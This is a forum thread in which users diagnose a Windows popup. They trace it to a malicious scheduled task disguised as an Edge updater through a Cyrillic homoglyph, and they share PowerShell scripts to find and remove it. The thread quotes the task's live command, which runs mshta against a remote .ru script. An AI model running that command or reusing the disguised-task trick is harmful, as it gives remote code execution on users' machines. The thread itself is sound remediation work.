Solved Blank Web site loads every morning

antspants · Sunday at 11:18 PM

I am assuming that if you find the scheduled task that contains what’s below, you wont get that popup and it will no longer contact that site
BUT has the task already compromised your OS? I have no idea.

antspants said:
Scheduled Task

Code:

Author: Spike xxx Action: mshta https ://that link.ru/update.app

Could run a remote-hosted script from a Russian domain directly on boot or login.

Dunno man…

Entry Status
BraveUpdate.exe /ua Safe (official auto-updater)
mshta https :// that link.ru/... Malicious — delete scheduled task
F:\User\...REG ADD HKLM...bat Suspicious — check contents OR is that Garlins BAT?
KMS.cmd Potentially unsafe — delete unless you use KMS legitimately

antspants · Monday at 6:25 AM

After contemplating your situation and generally & sincerely being concerned for your protection/security — my last word of advice is that you should, without any delay, reinstall Windows 11. (I know I am not alone thinking this)

I would also advise you to reset your Router to factory defaults and set it up again.

I’d hate to read that anything horrible happened.

Spunk · Monday at 5:49 PM

Nothing horrible has happened.

This hasn't just started happening, it has gone on for a while and I have tried everything I could think of before posting here, but as usual, no one knows anything either

Thank You for your help, but your script did not find anything. No URL's are loading at startup
As stated. I have Run Autoruns, and it did not find anything. This file never loads at Startup or from a cold boot.

To recap, this popup only comes up once a day after the computer running overnight after stopping my screen saver. This is the only time this happens during the day. Never when you restart or from a cold boot. The screensaver can kick in during the day and this file does not show up wen stopping the screensaver, until the next morning.
There are no scheduled tasks In Task Scheduler

There are no other symptoms. I have scanned with several Anti-Virus/Malware apps with nothing. reported I just restored an Image from 2 months ago, but the same file shows up., I am NOT doing a clean install of Windows. I have too many programs to reinstall, It would take me several days, that is why I am always making Images.

I cannot reset my router because I have several users using it. No other devices on the network have this file show up.
I will live with it for a while and try and fix it on my own. Thanks again for your help.

antspants · Monday at 5:53 PM

Spunk said:
Nothing horrible has happened.

Buddy if “Russians” wanted to add something to your PC that gives them a back door or implants malicious code or put’s them in a position to set off ransomware… or whatever, you’re not going to know about it until something “horrible has happened”

garlin · Monday at 5:57 PM

How do you say there's no scheduled tasks? The problem is the tasks folder hierarchy is kinda big, and running a MSHTA task is kinda sketchy in 2025. If you made that one-line code change to the PS script, it will output the full path of the task. It may be hidden under an innocuous folder path.

If you want to live it, it's your choice. But I think the solution isn't too far away based on the script's original output.

antspants · Monday at 6:08 PM

The last modification I made to this script was as you advised:

Code:
Replace

Code:

TaskName = $Task.TaskName

With >

Code:
Code:

URI = $Task.URI

Powershell:

$Output = @()

# --------------------------
# 1. User Run Entries
# --------------------------
$Output += "`r`n=== HKCU Run Entries ==="
$Output += (Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" | Select-Object PSChildName, Value | Out-String)

# --------------------------
# 2. Machine Run Entries
# --------------------------
$Output += "`r`n=== HKLM Run Entries ==="
$Output += (Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" | Select-Object PSChildName, Value | Out-String)

# --------------------------
# 3. All Scheduled Tasks
# --------------------------
$Output += "`r`n=== ALL Scheduled Tasks ==="
$AllTasks = Get-ScheduledTask | ForEach-Object {
    $Task = $_
    $Info = New-Object PSObject -Property @{
        URI        = $Task.URI
        Author        = $Task.Principal.UserId
        State         = $Task.State
        LastRunTime   = ($Task | Get-ScheduledTaskInfo).LastRunTime
        Actions       = ($Task.Actions | ForEach-Object { $_.Execute + " " + $_.Arguments }) -join "; "
        Triggers      = ($Task.Triggers | ForEach-Object { $_.StartBoundary }) -join "; "
    }
    $Info
}
$Output += ($AllTasks | Sort-Object TaskName | Format-Table -AutoSize | Out-String)

# --------------------------
# 4. Startup Services
# --------------------------
$Output += "`r`n=== Startup Services (Auto-Start) ==="
$StartupServices = Get-Service | Where-Object {$_.StartType -eq "Automatic"} | Select-Object DisplayName, Status, StartType
$Output += ($StartupServices | Sort-Object DisplayName | Format-Table -AutoSize | Out-String)

# --------------------------
# 5. Currently Running Suspicious Processes
# --------------------------
$Output += "`r`n=== Currently Running Suspicious Processes (Filtered) ==="
$Running = Get-Process | Where-Object {
    $_.Path -and (
        $_.Path -like "*AppData*" -or
        $_.Path -like "*Temp*" -or
        $_.Path -like "*brave*" -or
        $_.Path -like "*.ru*" -or
        $_.Path -like "*update*" -or
        $_.Path -like "*.exe"
    )
} | Select-Object Name, Id, Path
$Output += ($Running | Sort-Object Name | Format-Table -AutoSize | Out-String)

# --------------------------
# 6. Browser Startup URLs
# --------------------------
$Output += "`r`n=== Brave/Chrome/Edge Startup URLs ==="

$BrowserStartupPaths = @(
    "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default\Preferences",
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Preferences",
    "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Preferences"
)

foreach ($Path in $BrowserStartupPaths) {
    if (Test-Path $Path) {
        $Output += "`r`n--- Startup URLs in: $Path ---"
        $RawJson = Get-Content $Path -Raw
        $StartupUrls = ($RawJson | ConvertFrom-Json -ErrorAction SilentlyContinue).session.startup_urls
        if ($StartupUrls) {
            $Output += ($StartupUrls -join "`r`n")
        } else {
            $Output += "(No startup URLs found)"
        }
    }
}

# --------------------------
# Save to custom Desktop path (F:\User\Desktop)
# --------------------------
$CustomDesktop = "F:\User\Desktop"
$FilePath = Join-Path $CustomDesktop "Startup_Check_Full.txt"
$Output | Out-File -FilePath $FilePath -Encoding UTF8

Write-Host "`nFull startup and task info saved to: $FilePath" -ForegroundColor Green

KevTech · Monday at 6:13 PM

Spunk said:
Attached is a screenshot of the Startup Registry folder

Did you also look at user startup items?

Code:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Spunk · Monday at 8:03 PM

Post 31 has all the Startup Items. I have attached the Startup Registry key
Ran the latest script in Post 46 attached are the results.
Also Forgot to mention, I ran Farbar Recovery Suite, results attached

Again, this doesn't happen at Bootup. Only when stopping the screensaver in the morning, no other time.

Still NO Startup URL's Found.

antspants · Monday at 8:25 PM

From what I can see, my script Startup check still isn't showing where mshta https://yrewdvnkl.ru/update.app is. But it exists.
So obviously my script is inadequate, so I yield

garlin · Monday at 8:26 PM

@antspants' script didn't flag it, but FRST did.

Task: {880E6800-5859-48FC-B7A6-2B14C00C2A4E} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineUА => C:\WINDOWS\system32\mshta.exe [36864 2024-04-01] (Microsoft Windows -> Microsoft Corporation) -> hxxps://yrewdvnkl.ru/update.app

You can only see it in the original file, but "TaskMachineUA", the А in UА is the Cyrillic A.

This is a common trick to replace English letters with their Latin-alphabet cousins. If you're not paying attention or your text editor doesn't flag it, then your eye is fooled into thinking this is a legitimate MS task.

Copy the exact string from FRST.txt into the TaskName argument, you need to preserve the funky character as-is.

Code:

powershell Unregister-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUА"

antspants · Monday at 8:33 PM

OK Cheers.

What about a specific search?

Powershell:

# Search for a scheduled task using mshta and referencing the malicious domain
Get-ScheduledTask | ForEach-Object {
    $task = $_
    $info = $task | Get-ScheduledTaskInfo
    $matches = $false

    foreach ($action in $task.Actions) {
        if ($action.Execute -match "mshta" -and $action.Arguments -match "yrewdvnkl\.ru") {
            $matches = $true
        }
    }

    if ($matches -and $task.Principal.UserId -match "Spike Baron") {
        [PSCustomObject]@{
            TaskName     = $task.TaskName
            Path         = $task.TaskPath
            User         = $task.Principal.UserId
            Execute      = ($task.Actions | ForEach-Object { $_.Execute }) -join "; "
            Arguments    = ($task.Actions | ForEach-Object { $_.Arguments }) -join "; "
            Triggers     = ($task.Triggers | ForEach-Object { $_.StartBoundary }) -join "; "
            LastRunTime  = $info.LastRunTime
            State        = $task.State
        }
    }
}

antspants · Monday at 8:34 PM

I'm obviously way out of my league but can't seem to shut myself the freak up.

antspants · Monday at 8:35 PM

garlin said:
This is a common trick to replace English letters with their Latin-alphabet cousins. If you're not paying attention or your text editor doesn't flag it, then your eye is fooled into thinking this is a legitimate MS task.

I believe I mentioned this earlier, but didn't quite grasp it.

Spunk · Monday at 8:40 PM

The script from post 51 Found it. I ran Garlin's script in Post 50 results attached

antspants · Monday at 8:42 PM

Spunk said:
That found it, how do I get rid of it?

Try this: You should be prompted (I hope). Copy paste Powershell (Admin)

Powershell:

# Define the malicious domain and user
$MaliciousDomain = "yrewdvnkl.ru"
$TargetUser = "Spike Baron"

# Find and optionally remove malicious tasks
$MaliciousTasks = Get-ScheduledTask | ForEach-Object {
    $task = $_
    $info = $task | Get-ScheduledTaskInfo
    $match = $false

    foreach ($action in $task.Actions) {
        if ($action.Execute -match "mshta" -and $action.Arguments -match [regex]::Escape($MaliciousDomain)) {
            $match = $true
        }
    }

    if ($match -and $task.Principal.UserId -match [regex]::Escape($TargetUser)) {
        [PSCustomObject]@{
            TaskName    = $task.TaskName
            Path        = $task.TaskPath
            User        = $task.Principal.UserId
            Execute     = ($task.Actions | ForEach-Object { $_.Execute }) -join "; "
            Arguments   = ($task.Actions | ForEach-Object { $_.Arguments }) -join "; "
            Triggers    = ($task.Triggers | ForEach-Object { $_.StartBoundary }) -join "; "
            LastRunTime = $info.LastRunTime
            State       = $task.State
        }
    }
} | Where-Object { $_ -ne $null }

# If tasks found, display and remove
if ($MaliciousTasks.Count -gt 0) {
    Write-Host "`n=== Suspicious Task(s) Found ===" -ForegroundColor Yellow
    $MaliciousTasks | Format-List

    foreach ($task in $MaliciousTasks) {
        $confirm = Read-Host "`nDo you want to remove task '$($task.TaskName)'? (Y/N)"
        if ($confirm -match '^[Yy]$') {
            try {
                Unregister-ScheduledTask -TaskName $task.TaskName -TaskPath $task.Path -Confirm:$false
                Write-Host "✔ Removed task: $($task.TaskName)" -ForegroundColor Green
            } catch {
                Write-Host "✘ Failed to remove task: $($task.TaskName)" -ForegroundColor Red
                Write-Host "Error: $_"
            }
        } else {
            Write-Host "⏭ Skipped task: $($task.TaskName)" -ForegroundColor Cyan
        }
    }
} else {
    Write-Host "`n✔ No matching scheduled tasks found." -ForegroundColor Green
}

antspants · Monday at 8:44 PM

Or just go into Task Scheduler and you should be able to find task "MicrosoftEdgeUpdateTaskMachineUА"?
Delete it.

garlin · Monday at 8:47 PM

antspants said:
Or just go into Task Scheduler and you should be able to find task "MicrosoftEdgeUpdateTaskMachineUА"?
Delete it.

The RIGHT one. There's one with an English A, and one with a Cyrillic A.
You may have to click on the task's properties to expand the actual details.

antspants · Monday at 8:49 PM

garlin said:
The RIGHT one. There's one with an English A, and one with a Cyrillic A.
You may have to click on the task's properties to expand the actual details.

OK yeah right, I forgot there is a legit MicrosoftEdgeUpdateTaskMachineUА

antspants · Monday at 8:51 PM

Spunk said:
The script from post 51 Found it, how do I get rid of it?

The script just above (#55) should find and kill the correct one using references like yrewdvnkl .ru

It will ask you before deleting.

Spunk · Monday at 8:58 PM

No matching scheduled tasks found.

Solved Blank Web site loads every morning

Like a rolling drone.

My Computers

Like a rolling drone.

My Computers

Well-known member

My Computer

Like a rolling drone.

My Computers

Well-known member

My Computer

Like a rolling drone.

My Computers

Well-known member

My Computer

Well-known member

Attachments

My Computer

Like a rolling drone.

My Computers

Well-known member

My Computer

Like a rolling drone.

My Computers

Like a rolling drone.

My Computers

Like a rolling drone.

My Computers

Well-known member

Attachments

My Computer

Like a rolling drone.

My Computers

Like a rolling drone.

My Computers

Well-known member

My Computer

Like a rolling drone.

My Computers

Like a rolling drone.

My Computers

Well-known member

Attachments

My Computer